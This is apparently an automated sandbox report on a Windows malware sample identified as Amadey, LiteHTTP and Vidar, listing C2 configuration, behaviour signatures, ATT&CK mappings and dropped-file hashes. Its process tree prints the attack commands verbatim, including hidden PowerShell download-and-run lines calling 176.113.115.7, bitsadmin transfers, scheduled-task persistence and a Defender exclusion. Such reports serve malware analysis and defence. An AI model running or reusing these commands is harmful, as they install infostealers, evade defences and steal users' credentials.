Overview

overview

10

Static

static

5

44c657fa4e...92.exe

windows7-x64

10

44c657fa4e...92.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 19:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe

  • Size

    938KB

  • MD5

    ab988dd02c8cea50ac224daf0e53f3e9

  • SHA1

    050ebd6e5d25d9b84b722dcea79b2243890c1652

  • SHA256

    44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192

  • SHA512

    c8c9044520c124e47ace7b53e1824c70b41792cb7cdde0ab272a936dce82fb567743f1b2a7fa506b6357005974b1f33f8fee3f595b5a366894971de0b6f9f1bd

  • SSDEEP

    24576:lqDEvCTbMWu7rQYlBQcBiT6rprG8a0Qu:lTvC/MTQYxsWR7a0Q

Score
10/10
amadeylitehttpvidar092155ir7ambotdefense_evasiondiscoverydropperexecutionpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832
Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Vidar Stealer 6 IoCs
    stealer
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

    stealerbotlitehttp
  • Litehttp family
    litehttp
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
    defense_evasion
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

    execution
  • Download via BitsAdmin 1 TTPs 6 IoCs
    dropper
  • Downloads MZ/PE file 12 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 25 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 56 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 45 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 3 IoCs
    defense_evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe
    "C:\Users\Admin\AppData\Local\Temp\44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2900
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn wmcerma2BQ8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\3kUaM5be9.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3028
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn wmcerma2BQ8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\3kUaM5be9.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2164
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\3kUaM5be9.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:3032
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'O669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1708
        • C:\Users\Admin\AppData\Local\TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE
          "C:\Users\Admin\AppData\Local\TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2612
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2956
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10101971121\fCsM05d.cmd"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2548
              • C:\Windows\SysWOW64\fltMC.exe
                fltmc
                7⤵
                • System Location Discovery: System Language Discovery
                PID:776
              • C:\Windows\SysWOW64\bitsadmin.exe
                bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\Admin\AppData\Local\Temp\vrep_install\vrep.msi"
                7⤵
                • Download via BitsAdmin
                • System Location Discovery: System Language Discovery
                PID:2464
              • C:\Windows\SysWOW64\bitsadmin.exe
                bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\Admin\AppData\Local\Temp\vrep_install\Client32.ini"
                7⤵
                • Download via BitsAdmin
                • System Location Discovery: System Language Discovery
                PID:2972
              • C:\Windows\SysWOW64\bitsadmin.exe
                bitsadmin /transfer "DownloadLicense" https://authenticatior.com/NSM.lic "C:\Users\Admin\AppData\Local\Temp\vrep_install\NSM.lic"
                7⤵
                • Download via BitsAdmin
                • System Location Discovery: System Language Discovery
                PID:2740
            • C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
              "C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1480
              • C:\Users\Admin\AppData\Local\Temp\onefile_1480_133856769623186000\chromium.exe
                C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2436
            • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
              "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2900
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\ZlvyLQxn\Anubis.exe""
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1640
            • C:\Users\Admin\AppData\Local\Temp\10105750101\8372e5fe28.exe
              "C:\Users\Admin\AppData\Local\Temp\10105750101\8372e5fe28.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2336
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn tpM4YmaTSNc /tr "mshta C:\Users\Admin\AppData\Local\Temp\YBGJIB2jY.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2800
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn tpM4YmaTSNc /tr "mshta C:\Users\Admin\AppData\Local\Temp\YBGJIB2jY.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2532
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\YBGJIB2jY.hta
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:2500
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MJX0NVTYPMIIVGABQEI1WLJGTVL3YVE4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2508
                  • C:\Users\Admin\AppData\Local\TempMJX0NVTYPMIIVGABQEI1WLJGTVL3YVE4.EXE
                    "C:\Users\Admin\AppData\Local\TempMJX0NVTYPMIIVGABQEI1WLJGTVL3YVE4.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2132
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\10105760121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1608
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:1636
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1652
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1772
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:856
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1732
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2348
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1476
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "csZ1LmavKz8" /tr "mshta \"C:\Temp\9mQ31WOBw.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2360
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\9mQ31WOBw.hta"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2844
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2108
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2692
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10106031121\fCsM05d.cmd"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1560
              • C:\Windows\SysWOW64\fltMC.exe
                fltmc
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2604
              • C:\Windows\SysWOW64\bitsadmin.exe
                bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\Admin\AppData\Local\Temp\vrep_install\vrep.msi"
                7⤵
                • Download via BitsAdmin
                • System Location Discovery: System Language Discovery
                PID:2332
              • C:\Windows\SysWOW64\bitsadmin.exe
                bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\Admin\AppData\Local\Temp\vrep_install\Client32.ini"
                7⤵
                • Download via BitsAdmin
                • System Location Discovery: System Language Discovery
                PID:2180
              • C:\Windows\SysWOW64\bitsadmin.exe
                bitsadmin /transfer "DownloadLicense" https://authenticatior.com/NSM.lic "C:\Users\Admin\AppData\Local\Temp\vrep_install\NSM.lic"
                7⤵
                • Download via BitsAdmin
                • System Location Discovery: System Language Discovery
                PID:1992
            • C:\Users\Admin\AppData\Local\Temp\10106040101\zY9sqWs.exe
              "C:\Users\Admin\AppData\Local\Temp\10106040101\zY9sqWs.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1800
            • C:\Users\Admin\AppData\Local\Temp\10106050101\Ps7WqSx.exe
              "C:\Users\Admin\AppData\Local\Temp\10106050101\Ps7WqSx.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2612
            • C:\Users\Admin\AppData\Local\Temp\10106060101\FvbuInU.exe
              "C:\Users\Admin\AppData\Local\Temp\10106060101\FvbuInU.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              PID:1864
            • C:\Users\Admin\AppData\Local\Temp\10106070101\SvhQA35.exe
              "C:\Users\Admin\AppData\Local\Temp\10106070101\SvhQA35.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2788
              • C:\Users\Admin\AppData\Local\Temp\onefile_2788_133856770144850000\chromium.exe
                C:\Users\Admin\AppData\Local\Temp\10106070101\SvhQA35.exe
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2856
            • C:\Users\Admin\AppData\Local\Temp\10106080101\mAtJWNv.exe
              "C:\Users\Admin\AppData\Local\Temp\10106080101\mAtJWNv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:2552
              • C:\Users\Admin\AppData\Local\Temp\10106080101\mAtJWNv.exe
                "C:\Users\Admin\AppData\Local\Temp\10106080101\mAtJWNv.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1248
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2552 -s 500
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1640
            • C:\Users\Admin\AppData\Local\Temp\10106090101\ce4pMzk.exe
              "C:\Users\Admin\AppData\Local\Temp\10106090101\ce4pMzk.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2128
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\ZlvyLQxn\Anubis.exe""
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:712
            • C:\Users\Admin\AppData\Local\Temp\10106100101\Y87Oyyz.exe
              "C:\Users\Admin\AppData\Local\Temp\10106100101\Y87Oyyz.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1952
              • C:\Windows\Temp\{EF4CC017-04FA-4249-82D3-B60D8444388E}\.cr\Y87Oyyz.exe
                "C:\Windows\Temp\{EF4CC017-04FA-4249-82D3-B60D8444388E}\.cr\Y87Oyyz.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10106100101\Y87Oyyz.exe" -burn.filehandle.attached=180 -burn.filehandle.self=188
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2352
                • C:\Windows\Temp\{DC99ECD5-C160-497D-93E8-CAA97482363F}\.ba\SplashWin.exe
                  C:\Windows\Temp\{DC99ECD5-C160-497D-93E8-CAA97482363F}\.ba\SplashWin.exe
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2404
                  • C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
                    C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
                    9⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    PID:2420
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\SysWOW64\cmd.exe
                      10⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2272
            • C:\Users\Admin\AppData\Local\Temp\10106110101\MCxU5Fj.exe
              "C:\Users\Admin\AppData\Local\Temp\10106110101\MCxU5Fj.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:2248
              • C:\Users\Admin\AppData\Local\Temp\10106110101\MCxU5Fj.exe
                "C:\Users\Admin\AppData\Local\Temp\10106110101\MCxU5Fj.exe"
                7⤵
                • Executes dropped EXE
                PID:2952
              • C:\Users\Admin\AppData\Local\Temp\10106110101\MCxU5Fj.exe
                "C:\Users\Admin\AppData\Local\Temp\10106110101\MCxU5Fj.exe"
                7⤵
                • Executes dropped EXE
                PID:2580
              • C:\Users\Admin\AppData\Local\Temp\10106110101\MCxU5Fj.exe
                "C:\Users\Admin\AppData\Local\Temp\10106110101\MCxU5Fj.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2492
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 1020
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:444
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 520
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:2960
            • C:\Users\Admin\AppData\Local\Temp\10106120101\OEHBOHk.exe
              "C:\Users\Admin\AppData\Local\Temp\10106120101\OEHBOHk.exe"
              6⤵
              • Executes dropped EXE
              PID:2864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Persistence

BITS Jobs

1
T1197

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Defense Evasion

BITS Jobs

1
T1197

Modify Registry

3
T1112

Subvert Trust Controls

1
T1553

Install Root Certificate

1
T1553.004

Virtualization/Sandbox Evasion

2
T1497

Credential Access

Credentials from Password Stores

1
T1555

Credentials from Web Browsers

1
T1555.003

Unsecured Credentials

3
T1552

Credentials In Files

3
T1552.001

Discovery

Browser Information Discovery

1
T1217

Query Registry

4
T1012

System Information Discovery

2
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Virtualization/Sandbox Evasion

2
T1497

Lateral Movement

Collection

Data from Local System

3
T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Temp\9mQ31WOBw.hta
    Filesize

    779B

    MD5

    39c8cd50176057af3728802964f92d49

    SHA1

    68fc10a10997d7ad00142fc0de393fe3500c8017

    SHA256

    f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

    SHA512

    cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize

    71KB

    MD5

    83142242e97b8953c386f988aa694e4a

    SHA1

    833ed12fc15b356136dcdd27c61a50f59c5c7d50

    SHA256

    d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

    SHA512

    bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10101971121\fCsM05d.cmd
    Filesize

    1KB

    MD5

    9e4466ae223671f3afda11c6c1e107d1

    SHA1

    438b65cb77e77a41e48cdb16dc3dee191c2729c7

    SHA256

    ab289a1dc9ad423e385c539a539feec8c04604d17656c663e52e02ceebd4409f

    SHA512

    3f7be864e567e1906f9227fe4b8e47a9f16032d732aecfc7256e581939e3b810bc6e696c4a80be670624e5fd08c336d539e23ed825bd823614a2fcda3b21f2aa

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
    Filesize

    11.5MB

    MD5

    9da08b49cdcc4a84b4a722d1006c2af8

    SHA1

    7b5af0630b89bd2a19ae32aea30343330ca3a9eb

    SHA256

    215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd

    SHA512

    579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
    Filesize

    48KB

    MD5

    d39df45e0030e02f7e5035386244a523

    SHA1

    9ae72545a0b6004cdab34f56031dc1c8aa146cc9

    SHA256

    df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2

    SHA512

    69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10105750101\8372e5fe28.exe
    Filesize

    938KB

    MD5

    34ce923dd4ce9e4c36f2a79f301e37e2

    SHA1

    653fb9c967d743e847b7da20c185745080a6868c

    SHA256

    c0288db674852d84861481b9159e66f9a58f304012460cdf9ee6c1f01a37956b

    SHA512

    c0c187a142dc1816d3357dfafcc81efc9f89a9a754e2a158f36331eee4518e57ccd7847b6250c9b84e7e0dd737a4ad144bde622c5fd622fcff485d9216acb912

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10105760121\am_no.cmd
    Filesize

    1KB

    MD5

    cedac8d9ac1fbd8d4cfc76ebe20d37f9

    SHA1

    b0db8b540841091f32a91fd8b7abcd81d9632802

    SHA256

    5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

    SHA512

    ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10106040101\zY9sqWs.exe
    Filesize

    361KB

    MD5

    2bb133c52b30e2b6b3608fdc5e7d7a22

    SHA1

    fcb19512b31d9ece1bbe637fe18f8caf257f0a00

    SHA256

    b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630

    SHA512

    73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

    Download Submit

